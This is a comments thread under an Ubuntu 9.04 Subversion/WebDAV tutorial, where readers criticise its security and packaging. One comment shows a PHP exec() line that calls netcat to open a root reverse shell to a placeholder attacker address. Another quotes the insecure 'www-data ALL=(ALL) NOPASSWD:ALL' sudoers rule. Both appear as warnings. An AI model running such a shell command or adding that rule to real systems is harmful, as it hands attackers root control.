Comments on Setting Up Subversion W/ WebDav, Post-Commit Hook & Multiple Sites On Jaunty Jackalope (Ubuntu 9.04)
Setting Up Subversion W/ WebDav, Post-Commit Hook & Multiple Sites On Jaunty Jackalope (Ubuntu 9.04) This tutorial was designed for someone setting up their 1st Jaunty Jackalope (Ubuntu 9.04) - Subversion server. When I first started with Subversion, I became very frustrated with the many tutorials that were vague on the key part of what I was installing... Subversion! I included some "ease of use" packages for us Linux newbs :).
7 Comment(s)
Comments
I was just wondering why you've included MySQL and phpMyAdmin in your walkthru for Subversion? Is it because the website you're creating uses MySQL?
If so, fine, but some people won't need those two packages, and it just introduces another attack vector on their system.
All the best, JonTheNiceGuy
Good point Jon,
At the time I was taking notes for this tutorial, the setup I was making needed phpMyAdmin... I just didn't think to remove it. I will edit the tutorial and remove it, but as I stated in the "About this tutorial" this tutorial is based on a LAMP install which includes MySQL.
Mike
Hello. Nice tutorial you have here. I have only one problem related to web server part.
From what i know it's dangerous to let the web server obtain root access. Everywhere says that the web server should have the least access in the system.
I belive it is a major security leak to let the web server grant root and even without password! In this way, a person which has php exec() access can gain control and devastate your linux box.
For example :
<?php exec('sudo nc <attacker_ip> -p <attacker_port> -e /bin/bash '); ?> grants him a reverse connection to his computer, with your linux shell, running on root.
And of course this is not what we want .
To avoid the part with the www-sudo , i think you should chmod your repository 6 ( = read+write) for the www-data user . This is the easiest solution i'm thinking of right now.
Again, very useful tutorial, but watch out for the web server security.
Dan
P.s : i think in Ubuntu you should use the command "visudo" instead of actual editing the /etc/sudoers file.
As I stated I am pretty new at this whole thing, this was mostly to help people, like myself, who were struggling with SVN. I am currently reworking the tutorial to use groups, I am also reworking the post-commit to be more secure. For now I added a warning at the start of section 6.
Thanks for the input.
Mike
Why exactly do you want to modify sudoers that way? Firstly, it isn't needed - everything runs fine without giving www-data user full root rights. Secondly, you open up the front door (root access) for any exploit of the HTTPD environment. To prevent this, using an unpriviliged user for running HTTPD was originally introduced :)
Cheers,
- Rene
Several problems;
1) Webmin not supported on Ubuntu 9.04
2) Webmin Not located in repository mentioned. PGP Key invalid - no public key available for webmin.
2) Apache will not run when installed this way. it has a MPM Module missing failure. This is what appears to be a Perl compile error.
Not much reason to continue, the system is broken pretty badly after you fail on those items. RELOAD.
The document might be mislabeled and work on an 8.04 system with old unavailable packages but trying this on a 9.04 system is a WASTE OF TIME.
www-data ALL=(ALL) NOPASSWD:ALL
it does not mean anything if your server is behind a firewall... There is much more convenient ways to give www-data (apache) user to use svn commands >> man sudoers
This howto should not be public as it contains real security issues.